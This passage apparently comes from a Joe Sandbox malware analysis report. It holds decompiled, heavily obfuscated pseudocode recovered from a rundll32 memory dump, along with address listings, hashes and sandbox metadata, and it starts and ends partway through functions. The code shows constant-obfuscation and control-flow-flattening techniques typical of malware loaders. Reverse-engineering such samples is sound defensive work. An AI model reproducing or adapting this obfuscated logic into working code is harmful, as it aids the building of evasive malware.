                                                                                                                                                            				_v204 = 0x24209;
                                                                                                                                                            				_v204 = _v204 + 0xffffcebc;
                                                                                                                                                            				_v204 = _v204 ^ 0x847f2e61;
                                                                                                                                                            				_v204 = _v204 + 0xffff5302;
                                                                                                                                                            				_v204 = _v204 ^ 0x847f4f7c;
                                                                                                                                                            				_v260 = 0x4a587;
                                                                                                                                                            				_v260 = _v260 * 0x4a;
                                                                                                                                                            				_v260 = _v260 + 0xffff9bf3;
                                                                                                                                                            				_v260 = _v260 + 0xffff92e5;
                                                                                                                                                            				_v260 = _v260 ^ 0x015b504d;
                                                                                                                                                            				_v164 = 0x6d05db;
                                                                                                                                                            				_v164 = _v164 * 0x14;
                                                                                                                                                            				_v164 = _v164 >> 4;
                                                                                                                                                            				_v164 = _v164 ^ 0x556abaa4;
                                                                                                                                                            				_v164 = _v164 ^ 0x55e01079;
                                                                                                                                                            				_v20 = 0x80cc5b;
                                                                                                                                                            				_v20 = _v20 >> 0xd;
                                                                                                                                                            				_v20 = _v20 ^ 0x000efc86;
                                                                                                                                                            				_v104 = 0xc8e6e2;
                                                                                                                                                            				_v104 = _v104 << 8;
                                                                                                                                                            				_v104 = _v104 >> 0x10;
                                                                                                                                                            				_v104 = _v104 ^ 0x000afff3;
                                                                                                                                                            				_v272 = 0x560e69;
                                                                                                                                                            				_v272 = _v272 + 0x2793;
                                                                                                                                                            				_v272 = _v272 * 0xe;
                                                                                                                                                            				_v272 = _v272 + 0xc902;
                                                                                                                                                            				_v272 = _v272 ^ 0x04bc6edc;
                                                                                                                                                            				_v16 = 0xfcaf67;
                                                                                                                                                            				_v16 = _v16 / _t970;
                                                                                                                                                            				_v16 = _v16 ^ 0x000c0ba9;
                                                                                                                                                            				_v56 = 0x81a14f;
                                                                                                                                                            				_v56 = _v56 >> 0xb;
                                                                                                                                                            				_v56 = _v56 ^ 0x000fb9cd;
                                                                                                                                                            				_v32 = 0x24333c;
                                                                                                                                                            				_v32 = _v32 / _t985;
                                                                                                                                                            				_v32 = _v32 ^ 0x00065bee;
                                                                                                                                                            				_v124 = 0xe3a445;
                                                                                                                                                            				_v124 = _v124 >> 5;
                                                                                                                                                            				_v124 = _v124 >> 7;
                                                                                                                                                            				_v124 = _v124 ^ 0x0000dfdf;
                                                                                                                                                            				_v220 = 0x5f21d9;
                                                                                                                                                            				_t971 = 0x79;
                                                                                                                                                            				_v220 = _v220 * 0x54;
                                                                                                                                                            				_v220 = _v220 << 5;
                                                                                                                                                            				_v220 = _v220 ^ 0x0e372a7b;
                                                                                                                                                            				_v220 = _v220 ^ 0xe8dc9c41;
                                                                                                                                                            				_v188 = 0xc44d01;
                                                                                                                                                            				_v188 = _v188 ^ 0x0373dd04;
                                                                                                                                                            				_v188 = _v188 * 0x30;
                                                                                                                                                            				_v188 = _v188 ^ 0xfb03bbf0;
                                                                                                                                                            				_v188 = _v188 ^ 0x496460ca;
                                                                                                                                                            				_v268 = 0x8213af;
                                                                                                                                                            				_v268 = _v268 ^ 0x6d9501b2;
                                                                                                                                                            				_v268 = _v268 | 0x4d165578;
                                                                                                                                                            				_v268 = _v268 >> 4;
                                                                                                                                                            				_v268 = _v268 ^ 0x06d55fab;
                                                                                                                                                            				_v212 = 0x705526;
                                                                                                                                                            				_v212 = _v212 >> 0xa;
                                                                                                                                                            				_v212 = _v212 << 9;
                                                                                                                                                            				_v212 = _v212 >> 8;
                                                                                                                                                            				_v212 = _v212 ^ 0x000b72c4;
                                                                                                                                                            				_v92 = 0xc8093b;
                                                                                                                                                            				_v92 = _v92 + 0xd043;
                                                                                                                                                            				_v92 = _v92 ^ 0x00ca3bde;
                                                                                                                                                            				_v264 = 0x1f9619;
                                                                                                                                                            				_v264 = _v264 + 0xffffbc34;
                                                                                                                                                            				_v264 = _v264 * 0x3e;
                                                                                                                                                            				_v264 = _v264 * 0x52;
                                                                                                                                                            				_v264 = _v264 ^ 0x6e0edc82;
                                                                                                                                                            				_v96 = 0x6d9960;
                                                                                                                                                            				_v96 = _v96 | 0x9fb7a8f9;
                                                                                                                                                            				_v96 = _v96 ^ 0x9ff35e32;
                                                                                                                                                            				_v144 = 0x447df2;
                                                                                                                                                            				_v144 = _v144 << 8;
                                                                                                                                                            				_v144 = _v144 + 0xffff6cb2;
                                                                                                                                                            				_v144 = _v144 ^ 0x44714589;
                                                                                                                                                            				_v240 = 0x65db08;
                                                                                                                                                            				_v240 = _v240 * 6;
                                                                                                                                                            				_v240 = _v240 + 0x5f97;
                                                                                                                                                            				_v240 = _v240 >> 0xd;
                                                                                                                                                            				_v240 = _v240 ^ 0x000293b4;
                                                                                                                                                            				_v84 = 0x3c7c20;
                                                                                                                                                            				_v84 = _v84 ^ 0x2c3d49c2;
                                                                                                                                                            				_v84 = _v84 ^ 0x2c080053;
                                                                                                                                                            				_v248 = 0x13c85;
                                                                                                                                                            				_v248 = _v248 + 0x8cd8;
                                                                                                                                                            				_v248 = _v248 + 0x6e3d;
                                                                                                                                                            				_v248 = _v248 ^ 0xe59eace5;
                                                                                                                                                            				_v248 = _v248 ^ 0xe5984999;
                                                                                                                                                            				_v216 = 0x6164ef;
                                                                                                                                                            				_v216 = _v216 << 6;
                                                                                                                                                            				_v216 = _v216 + 0xffff2edc;
                                                                                                                                                            				_v216 = _v216 | 0xa66c888f;
                                                                                                                                                            				_v216 = _v216 ^ 0xbe7947d5;
                                                                                                                                                            				_v232 = 0x991e82;
                                                                                                                                                            				_v232 = _v232 + 0xffff48fb;
                                                                                                                                                            				_v232 = _v232 >> 0xe;
                                                                                                                                                            				_v232 = _v232 | 0x69e4ac2c;
                                                                                                                                                            				_v232 = _v232 ^ 0x69ef7d1b;
                                                                                                                                                            				_v68 = 0x9d94b2;
                                                                                                                                                            				_v68 = _v68 | 0xcead792c;
                                                                                                                                                            				_v68 = _v68 ^ 0xceb9e800;
                                                                                                                                                            				_v44 = 0x20071e;
                                                                                                                                                            				_v44 = _v44 / _t971;
                                                                                                                                                            				_v44 = _v44 ^ 0x000a654c;
                                                                                                                                                            				_v128 = 0x223cb7;
                                                                                                                                                            				_v128 = _v128 + 0x9bf0;
                                                                                                                                                            				_v128 = _v128 | 0x79b7d361;
                                                                                                                                                            				_v128 = _v128 ^ 0x79b3b147;
                                                                                                                                                            				_v52 = 0x8ed203;
                                                                                                                                                            				_v52 = _v52 + 0xffff1a7b;
                                                                                                                                                            				_v52 = _v52 ^ 0x008be8c4;
                                                                                                                                                            				_v208 = 0xe0ac17;
                                                                                                                                                            				_v208 = _v208 ^ 0xbcfe8cf2;
                                                                                                                                                            				_t972 = 0x6b;
                                                                                                                                                            				_v208 = _v208 / _t972;
                                                                                                                                                            				_v208 = _v208 | 0x3ee9ec5f;
                                                                                                                                                            				_v208 = _v208 ^ 0x3fec9c1d;
                                                                                                                                                            				_v192 = 0x219bfa;
                                                                                                                                                            				_v192 = _v192 >> 4;
                                                                                                                                                            				_v192 = _v192 + 0x77e4;
                                                                                                                                                            				_v192 = _v192 | 0x2fb4141c;
                                                                                                                                                            				_v192 = _v192 ^ 0x2fb2076e;
                                                                                                                                                            				_v200 = 0x8926e2;
                                                                                                                                                            				_v200 = _v200 << 4;
                                                                                                                                                            				_t973 = 0xc;
                                                                                                                                                            				_v200 = _v200 / _t973;
                                                                                                                                                            				_v200 = _v200 + 0xffff5704;
                                                                                                                                                            				_v200 = _v200 ^ 0x00bbfbcc;
                                                                                                                                                            				_v284 = 0xaed0cb;
                                                                                                                                                            				_v284 = _v284 + 0x9c17;
                                                                                                                                                            				_v284 = _v284 + 0xaf6d;
                                                                                                                                                            				_v284 = _v284 ^ 0x00b89bc1;
                                                                                                                                                            				_v168 = 0x914ce9;
                                                                                                                                                            				_v168 = _v168 | 0xceb3d4af;
                                                                                                                                                            				_v168 = _v168 ^ 0x5adaba1c;
                                                                                                                                                            				_v168 = _v168 ^ 0x3c292fbf;
                                                                                                                                                            				_v168 = _v168 ^ 0xa84ea968;
                                                                                                                                                            				_v156 = 0x90c891;
                                                                                                                                                            				_v156 = _v156 + 0xffff3667;
                                                                                                                                                            				_t974 = 0x5c;
                                                                                                                                                            				_v156 = _v156 / _t974;
                                                                                                                                                            				_t975 = 0x3c;
                                                                                                                                                            				_v156 = _v156 / _t975;
                                                                                                                                                            				_v156 = _v156 ^ 0x000da682;
                                                                                                                                                            				_v140 = 0xffcb83;
                                                                                                                                                            				_v140 = _v140 << 0xd;
                                                                                                                                                            				_v140 = _v140 | 0xcebab625;
                                                                                                                                                            				_v140 = _v140 ^ 0xfff71570;
                                                                                                                                                            				_v280 = 0xfef1ee;
                                                                                                                                                            				_v280 = _v280 >> 8;
                                                                                                                                                            				_v280 = _v280 + 0xffff306e;
                                                                                                                                                            				_v280 = _v280 | 0x3331510b;
                                                                                                                                                            				_v280 = _v280 ^ 0x3338227a;
                                                                                                                                                            				_v176 = 0xc7331d;
                                                                                                                                                            				_v176 = _v176 >> 7;
                                                                                                                                                            				_v176 = _v176 + 0x1d50;
                                                                                                                                                            				_v176 = _v176 << 5;
                                                                                                                                                            				_v176 = _v176 ^ 0x00370898;
                                                                                                                                                            				_v288 = 0x519041;
                                                                                                                                                            				_v288 = _v288 + 0x7cd9;
                                                                                                                                                            				_v288 = _v288 ^ 0x0057f5a9;
                                                                                                                                                            				_t976 = _v12;
                                                                                                                                                            				_t986 = _v12;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t939 = 0x68a9e90;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t823 = _v184;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L3:
                                                                                                                                                            							_t991 = _t977 - _t939;
                                                                                                                                                            							if(_t991 > 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t991 == 0) {
                                                                                                                                                            								__eflags =  *_v8;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_push(_v104);
                                                                                                                                                            									_push(_v20);
                                                                                                                                                            									_t868 = E0038DCF7(_v164, 0x371524, __eflags);
                                                                                                                                                            									_v276 = _t868;
                                                                                                                                                            								}
                                                                                                                                                            								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
                                                                                                                                                            								_t981 = _a44 & 1;
                                                                                                                                                            								__eflags = _t981;
                                                                                                                                                            								if(_t981 != 0) {
                                                                                                                                                            									__eflags = _t845;
                                                                                                                                                            								}
                                                                                                                                                            								_push(_t868);
                                                                                                                                                            								_t976 = E003775FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
                                                                                                                                                            								E0037A8B0(_v268, _v276, _v212);
                                                                                                                                                            								_t988 =  &(_t988[0xe]);
                                                                                                                                                            								__eflags = _t976;
                                                                                                                                                            								if(_t976 == 0) {
                                                                                                                                                            									_t977 = 0x51daea9;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_v96);
                                                                                                                                                            									_push(_v264);
                                                                                                                                                            									_push(_v256);
                                                                                                                                                            									_v60 = 1;
                                                                                                                                                            									_push( &_v60);
                                                                                                                                                            									_push(_v92);
                                                                                                                                                            									_t948 = 4;
                                                                                                                                                            									E00379670(_t976, _t948);
                                                                                                                                                            									_t988 =  &(_t988[5]);
                                                                                                                                                            									__eflags = _t981;
                                                                                                                                                            									if(_t981 != 0) {
                                                                                                                                                            										E0038408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
                                                                                                                                                            										_t732 =  &_v60;
                                                                                                                                                            										 *_t732 = _v60 | _v136;
                                                                                                                                                            										__eflags =  *_t732;
                                                                                                                                                            										E00379670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
                                                                                                                                                            										_t988 =  &(_t988[0xb]);
                                                                                                                                                            									}
                                                                                                                                                            									_t977 = 0xbee37f5;
                                                                                                                                                            								}
                                                                                                                                                            								L11:
                                                                                                                                                            								_t868 = _v276;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t977 == 0x2602436) {
                                                                                                                                                            								_t977 = 0x506ebc3;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t977 == 0x329d839) {
                                                                                                                                                            								_t977 = 0x2602436;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t977 == 0x4bb42fe) {
                                                                                                                                                            								_t823 = E003788C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
                                                                                                                                                            								_t868 = _v276;
                                                                                                                                                            								_t988 =  &(_t988[0xd]);
                                                                                                                                                            								__eflags = _t823;
                                                                                                                                                            								_v184 = _t823;
                                                                                                                                                            								_t939 = 0x68a9e90;
                                                                                                                                                            								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t977 == 0x506ebc3) {
                                                                                                                                                            								_push(_t868);
                                                                                                                                                            								_push(_v72);
                                                                                                                                                            								_push(_v160);
                                                                                                                                                            								_push(_v28);
                                                                                                                                                            								_push(_v152);
                                                                                                                                                            								_t858 = E0038DAC6(_v112, _v180);
                                                                                                                                                            								_t986 = _t858;
                                                                                                                                                            								__eflags = _t858;
                                                                                                                                                            								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
                                                                                                                                                            								E00388519(_v88, _v48, 0);
                                                                                                                                                            								_t988 = _t988 - 0xc + 0x24;
                                                                                                                                                            								L37:
                                                                                                                                                            								_t868 = _v276;
                                                                                                                                                            								_t939 = 0x68a9e90;
                                                                                                                                                            								L38:
                                                                                                                                                            								__eflags = _t977 - 0xdf8c541;
                                                                                                                                                            								if(_t977 == 0xdf8c541) {
                                                                                                                                                            									L41:
                                                                                                                                                            									return _t862;
                                                                                                                                                            								}
                                                                                                                                                            								_t823 = _v184;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t977 != 0x51daea9) {
                                                                                                                                                            								goto L38;
                                                                                                                                                            							}
                                                                                                                                                            							E00372B62(_v168, _t823, _v156, _v140);
                                                                                                                                                            							_t977 = 0x9a35046;
                                                                                                                                                            							goto L11;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t977 - 0x81a6b17;
                                                                                                                                                            						if(_t977 == 0x81a6b17) {
                                                                                                                                                            							E00372B62(_v192, _t976, _v200, _v284);
                                                                                                                                                            							_t977 = 0x51daea9;
                                                                                                                                                            							goto L37;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t977 - 0x9a35046;
                                                                                                                                                            						if(_t977 == 0x9a35046) {
                                                                                                                                                            							E00372B62(_v280, _t986, _v176, _v288);
                                                                                                                                                            							goto L41;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t977 - 0xb70b8d2;
                                                                                                                                                            						if(_t977 == 0xb70b8d2) {
                                                                                                                                                            							__eflags = E0038A2E8(_t976, _a4);
                                                                                                                                                            							_t977 = 0x81a6b17;
                                                                                                                                                            							_t829 = 1;
                                                                                                                                                            							_t862 =  !=  ? _t829 : _t862;
                                                                                                                                                            							goto L11;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t977 - 0xba06d79;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							__eflags = E003909B5(_t976, _v120, __eflags) - _v36;
                                                                                                                                                            							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
                                                                                                                                                            							goto L11;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t977 - 0xbee37f5;
                                                                                                                                                            						if(_t977 != 0xbee37f5) {
                                                                                                                                                            							goto L38;
                                                                                                                                                            						}
                                                                                                                                                            						_t832 = _v8;
                                                                                                                                                            						_t888 =  *_t832;
                                                                                                                                                            						__eflags = _t888;
                                                                                                                                                            						if(_t888 == 0) {
                                                                                                                                                            							_t833 = 0;
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t833 = _t832[1];
                                                                                                                                                            						}
                                                                                                                                                            						E00372AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
                                                                                                                                                            						_t988 =  &(_t988[7]);
                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                            						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
                                                                                                                                                            						goto L11;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}
                                                                                                                                                            0x0038e79e
                                                                                                                                                            0x0038e7ac
                                                                                                                                                            0x0038e7b1
                                                                                                                                                            0x0038e7b7
                                                                                                                                                            0x0038e7bf
                                                                                                                                                            0x0038e7cb
                                                                                                                                                            0x0038e7d0
                                                                                                                                                            0x0038e7d6
                                                                                                                                                            0x0038e7de
                                                                                                                                                            0x0038e7ea
                                                                                                                                                            0x0038e7ef
                                                                                                                                                            0x0038e7f5
                                                                                                                                                            0x0038e7fd
                                                                                                                                                            0x0038e805
                                                                                                                                                            0x0038e80d
                                                                                                                                                            0x0038e815
                                                                                                                                                            0x0038e821
                                                                                                                                                            0x0038e826
                                                                                                                                                            0x0038e82c
                                                                                                                                                            0x0038e834
                                                                                                                                                            0x0038e83c
                                                                                                                                                            0x0038e841
                                                                                                                                                            0x0038e846
                                                                                                                                                            0x0038e84e
                                                                                                                                                            0x0038e859
                                                                                                                                                            0x0038e861
                                                                                                                                                            0x0038e869
                                                                                                                                                            0x0038e874
                                                                                                                                                            0x0038e87f
                                                                                                                                                            0x0038e88a
                                                                                                                                                            0x0038e895
                                                                                                                                                            0x0038e8a0
                                                                                                                                                            0x0038e8ab
                                                                                                                                                            0x0038e8b6
                                                                                                                                                            0x0038e8be
                                                                                                                                                            0x0038e8d0
                                                                                                                                                            0x0038e8d5
                                                                                                                                                            0x0038e8de
                                                                                                                                                            0x0038e8e9
                                                                                                                                                            0x0038e8f4
                                                                                                                                                            0x0038e8ff
                                                                                                                                                            0x0038e90a
                                                                                                                                                            0x0038e915
                                                                                                                                                            0x0038e920
                                                                                                                                                            0x0038e932
                                                                                                                                                            0x0038e935
                                                                                                                                                            0x0038e93c
                                                                                                                                                            0x0038e947
                                                                                                                                                            0x0038e952
                                                                                                                                                            0x0038e95d
                                                                                                                                                            0x0038e968
                                                                                                                                                            0x0038e973
                                                                                                                                                            0x0038e97e
                                                                                                                                                            0x0038e989
                                                                                                                                                            0x0038e99f
                                                                                                                                                            0x0038e9a4
                                                                                                                                                            0x0038e9ab
                                                                                                                                                            0x0038e9b6
                                                                                                                                                            0x0038e9ca
                                                                                                                                                            0x0038e9cf
                                                                                                                                                            0x0038e9d6
                                                                                                                                                            0x0038e9de
                                                                                                                                                            0x0038e9e9
                                                                                                                                                            0x0038e9f7
                                                                                                                                                            0x0038e9fc
                                                                                                                                                            0x0038ea00
                                                                                                                                                            0x0038ea05
                                                                                                                                                            0x0038ea0a
                                                                                                                                                            0x0038ea12
                                                                                                                                                            0x0038ea1d
                                                                                                                                                            0x0038ea28
                                                                                                                                                            0x0038ea33
                                                                                                                                                            0x0038ea48
                                                                                                                                                            0x0038ea49
                                                                                                                                                            0x0038ea50
                                                                                                                                                            0x0038ea5b
                                                                                                                                                            0x0038ea63
                                                                                                                                                            0x0038ea6b
                                                                                                                                                            0x0038ea73
                                                                                                                                                            0x0038ea7b
                                                                                                                                                            0x0038ea83
                                                                                                                                                            0x0038ea90
                                                                                                                                                            0x0038ea94
                                                                                                                                                            0x0038ea9c
                                                                                                                                                            0x0038eaa4
                                                                                                                                                            0x0038eaac
                                                                                                                                                            0x0038eabf
                                                                                                                                                            0x0038eac6
                                                                                                                                                            0x0038eace
                                                                                                                                                            0x0038ead9
                                                                                                                                                            0x0038eae4
                                                                                                                                                            0x0038eaef
                                                                                                                                                            0x0038eaf7
                                                                                                                                                            0x0038eb02
                                                                                                                                                            0x0038eb0d
                                                                                                                                                            0x0038eb15
                                                                                                                                                            0x0038eb1d
                                                                                                                                                            0x0038eb28
                                                                                                                                                            0x0038eb30
                                                                                                                                                            0x0038eb3d
                                                                                                                                                            0x0038eb41
                                                                                                                                                            0x0038eb49
                                                                                                                                                            0x0038eb51
                                                                                                                                                            0x0038eb67
                                                                                                                                                            0x0038eb6e
                                                                                                                                                            0x0038eb79
                                                                                                                                                            0x0038eb84
                                                                                                                                                            0x0038eb8c
                                                                                                                                                            0x0038eb97
                                                                                                                                                            0x0038ebab
                                                                                                                                                            0x0038ebb2
                                                                                                                                                            0x0038ebbd
                                                                                                                                                            0x0038ebc8
                                                                                                                                                            0x0038ebd2
                                                                                                                                                            0x0038ebda
                                                                                                                                                            0x0038ebe5
                                                                                                                                                            0x0038ebf4
                                                                                                                                                            0x0038ebf5
                                                                                                                                                            0x0038ebf9
                                                                                                                                                            0x0038ebfe
                                                                                                                                                            0x0038ec06
                                                                                                                                                            0x0038ec0e
                                                                                                                                                            0x0038ec16
                                                                                                                                                            0x0038ec23
                                                                                                                                                            0x0038ec27
                                                                                                                                                            0x0038ec2f
                                                                                                                                                            0x0038ec37
                                                                                                                                                            0x0038ec3f
                                                                                                                                                            0x0038ec47
                                                                                                                                                            0x0038ec4f
                                                                                                                                                            0x0038ec54
                                                                                                                                                            0x0038ec5c
                                                                                                                                                            0x0038ec64
                                                                                                                                                            0x0038ec69
                                                                                                                                                            0x0038ec6e
                                                                                                                                                            0x0038ec73
                                                                                                                                                            0x0038ec7b
                                                                                                                                                            0x0038ec86
                                                                                                                                                            0x0038ec91
                                                                                                                                                            0x0038ec9c
                                                                                                                                                            0x0038eca4
                                                                                                                                                            0x0038ecb1
                                                                                                                                                            0x0038ecba
                                                                                                                                                            0x0038ecbe
                                                                                                                                                            0x0038ecc6
                                                                                                                                                            0x0038ecd1
                                                                                                                                                            0x0038ecdc
                                                                                                                                                            0x0038ece7
                                                                                                                                                            0x0038ecf2
                                                                                                                                                            0x0038ecfa
                                                                                                                                                            0x0038ed05
                                                                                                                                                            0x0038ed10
                                                                                                                                                            0x0038ed1d
                                                                                                                                                            0x0038ed21
                                                                                                                                                            0x0038ed29
                                                                                                                                                            0x0038ed2e
                                                                                                                                                            0x0038ed36
                                                                                                                                                            0x0038ed41
                                                                                                                                                            0x0038ed4c
                                                                                                                                                            0x0038ed57
                                                                                                                                                            0x0038ed5f
                                                                                                                                                            0x0038ed67
                                                                                                                                                            0x0038ed6f
                                                                                                                                                            0x0038ed77
                                                                                                                                                            0x0038ed7f
                                                                                                                                                            0x0038ed87
                                                                                                                                                            0x0038ed8c
                                                                                                                                                            0x0038ed94
                                                                                                                                                            0x0038f37f
                                                                                                                                                            0x0038f384
                                                                                                                                                            0x0038f38c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038f38c
                                                                                                                                                            0x0038f029

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                                                            • API String ID: 0-3417817227
                                                                                                                                                            • Opcode ID: d17fc4ed942c767a102bd4ca085621176d25c0d36fa61cc656976efca8d39cdb
                                                                                                                                                            • Instruction ID: a600caac3bc1915f5be62c0a7837e67f416c292623702fac3b8720495c25fa1a
                                                                                                                                                            • Opcode Fuzzy Hash: d17fc4ed942c767a102bd4ca085621176d25c0d36fa61cc656976efca8d39cdb
                                                                                                                                                            • Instruction Fuzzy Hash: ED820EB1508381CFD379CF25C54AA8BBBE1BBD4718F108A2DE5D996260D7B48949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037BB7E(intOrPtr* __ecx) {
                                                                                                                                                            				char _v68;
                                                                                                                                                            				char _v76;
                                                                                                                                                            				void* _v88;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                            				intOrPtr* _v100;
                                                                                                                                                            				char _v104;
                                                                                                                                                            				char _v108;
                                                                                                                                                            				char _v112;
                                                                                                                                                            				char _v116;
                                                                                                                                                            				char _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				signed int _v272;
                                                                                                                                                            				signed int _v276;
                                                                                                                                                            				signed int _v280;
                                                                                                                                                            				signed int _v284;
                                                                                                                                                            				signed int _v288;
                                                                                                                                                            				signed int _v292;
                                                                                                                                                            				signed int _v296;
                                                                                                                                                            				signed int _v300;
                                                                                                                                                            				signed int _v304;
                                                                                                                                                            				signed int _v308;
                                                                                                                                                            				signed int _v312;
                                                                                                                                                            				signed int _v316;
                                                                                                                                                            				signed int _v320;
                                                                                                                                                            				signed int _v324;
                                                                                                                                                            				signed int _v328;
                                                                                                                                                            				signed int _v332;
                                                                                                                                                            				signed int _v336;
                                                                                                                                                            				signed int _v340;
                                                                                                                                                            				signed int _v344;
                                                                                                                                                            				signed int _v348;
                                                                                                                                                            				signed int _v352;
                                                                                                                                                            				signed int _v356;
                                                                                                                                                            				signed int _v360;
                                                                                                                                                            				signed int _v364;
                                                                                                                                                            				signed int _v368;
                                                                                                                                                            				signed int _v372;
                                                                                                                                                            				signed int _v376;
                                                                                                                                                            				signed int _v380;
                                                                                                                                                            				signed int _v384;
                                                                                                                                                            				void* _t690;
                                                                                                                                                            				void* _t691;
                                                                                                                                                            				void* _t697;
                                                                                                                                                            				void* _t700;
                                                                                                                                                            				void* _t701;
                                                                                                                                                            				void* _t704;
                                                                                                                                                            				void* _t710;
                                                                                                                                                            				char _t711;
                                                                                                                                                            				void* _t713;
                                                                                                                                                            				void* _t717;
                                                                                                                                                            				void* _t719;
                                                                                                                                                            				void* _t725;
                                                                                                                                                            				signed int _t732;
                                                                                                                                                            				signed int _t733;
                                                                                                                                                            				signed int _t734;
                                                                                                                                                            				signed int _t735;
                                                                                                                                                            				signed int _t736;
                                                                                                                                                            				signed int _t737;
                                                                                                                                                            				signed int _t738;
                                                                                                                                                            				signed int _t739;
                                                                                                                                                            				signed int _t740;
                                                                                                                                                            				signed int _t741;
                                                                                                                                                            				signed int _t742;
                                                                                                                                                            				signed int _t743;
                                                                                                                                                            				signed int _t744;
                                                                                                                                                            				signed int _t745;
                                                                                                                                                            				signed int _t746;
                                                                                                                                                            				void* _t747;
                                                                                                                                                            				void* _t763;
                                                                                                                                                            				void* _t772;
                                                                                                                                                            				void* _t819;
                                                                                                                                                            				intOrPtr _t834;
                                                                                                                                                            				void* _t840;
                                                                                                                                                            				void* _t842;
                                                                                                                                                            				void* _t846;
                                                                                                                                                            				void* _t847;
                                                                                                                                                            				void* _t850;
                                                                                                                                                            
                                                                                                                                                            				_v92 = 0xf68129;
                                                                                                                                                            				_v100 = __ecx;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t732 = 0x6b;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t846 = 0;
                                                                                                                                                            				_t725 = 0x7252bf3;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v136 = 0x5ab987;
                                                                                                                                                            				_v136 = _v136 * 0x2c;
                                                                                                                                                            				_v136 = _v136 ^ 0x0f97e334;
                                                                                                                                                            				_v240 = 0x5f59f0;
                                                                                                                                                            				_v240 = _v240 << 5;
                                                                                                                                                            				_v240 = _v240 * 0x46;
                                                                                                                                                            				_v240 = _v240 ^ 0x4252f400;
                                                                                                                                                            				_v320 = 0x63212;
                                                                                                                                                            				_v320 = _v320 + 0xffffd9b7;
                                                                                                                                                            				_v320 = _v320 * 0x26;
                                                                                                                                                            				_v320 = _v320 + 0xffff4af1;
                                                                                                                                                            				_v320 = _v320 ^ 0x00e50ac7;
                                                                                                                                                            				_v192 = 0x354250;
                                                                                                                                                            				_t26 =  &_v192; // 0x354250
